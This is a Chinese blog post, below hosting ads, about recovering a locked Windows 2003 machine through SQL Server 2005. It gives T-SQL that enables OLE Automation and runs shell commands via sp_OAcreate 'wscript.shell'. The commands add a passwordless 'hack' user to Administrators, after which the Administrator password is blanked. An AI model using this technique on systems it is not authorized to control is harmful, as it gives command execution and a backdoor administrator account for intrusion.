Windows2003 SQL2005添加系统用户修改系统登录密码(sql2012添加用户)深度揭秘

随心笔谈2年前发布 编辑
167 0
🌐 经济型:买域名、轻量云服务器、用途:游戏 网站等 《腾讯云》特点:特价机便宜 适合初学者用 点我优惠购买
🚀 拓展型:买域名、轻量云服务器、用途:游戏 网站等 《阿里云》特点:中档服务器便宜 域名备案事多 点我优惠购买
🛡️ 稳定型:买域名、轻量云服务器、用途:游戏 网站等 《西部数码》 特点:比上两家略贵但是稳定性超好事也少 点我优惠购买



今天上班的时候,有个同事说不知道谁设置了开机密码,那台电脑一直没有开机密码的他现在进不了桌面

那台电脑没有光驱,而我手头上启动U盘又没有,不然用winpe自带的密码破解工具破解开机密码了

幸亏那台电脑是开发机而且安装了SQLSERVER2005,幸亏他记得SQLSERVER的sa用户和密码,那就有戏了o

输入下面的SQL语句,添加一个Administrator组别的系统用户

复制代码 代码如下:

–打开高级选项,看Ole Automation Procedures OLE自动化开启了没有

EXEC [sys].[sp_configure] @configname=’show advanced options’, — varchar(35)

@configvalue=1 — int

RECONFIGURE WITH override

GO

–查看是否开启

EXEC [sys].[sp_configure]

–如果没有就开启

EXEC [sys].[sp_configure] @configname=’Ole Automation Procedures’, — varchar(35)

@configvalue=1 — int

复制代码 代码如下:

–添加一个hack用户,所属用户组为Administrators

DECLARE @shell INT

EXEC SP_OAcreate ‘wscript.shell’,@shell out

EXEC SP_OAMETHOD @shell,’run’,null, ‘net user hack  /add’

EXEC SP_OAMETHOD @shell,’run’,null, ‘net localgroup Administrators hack /add’

用hack用户进入系统,hack的密码为空,然后进入计算机-》右键-》管理-》本地用户和组-》把administrator的密码设置为空,

然后打开任务管理器,点击“用户”标签,在用户界面,选中hack用户,右键-》断开,Windows弹出对话框说hack用户的Windows会话会终结,

数据不能保存,选择“是”,然后弹出登录对话框,在用户名的输入框里输入“administrator”,密码输入框为空密码,成功登录桌面了

幸亏知道SQLSERVER数据库安全的一些知识,不然真的要重装系统了,整个过程都是利用了OLE自动化,他相当于给你一个cmd环境,让你可以输入cmd命令

其实我觉得SQLSERVER使用Windows服务来写这个理念是挺好的,不用开机启动然后需要双击sqlserver.exe来运行用Windows服务的话,开机就启动了都不用进入桌面

我上司跟我说比较大型的平台软件一般都会用Windows服务来编写,将关键核心部分用Windows服务来运行,就像我们公司的软件

大部分核心功能都用Windows服务来运行的,不过用Windows服务也有不好的地方,就是如果服务启动不起来了,您的软件也运行不了,就像SQLSERVER。

© 版权声明

相关文章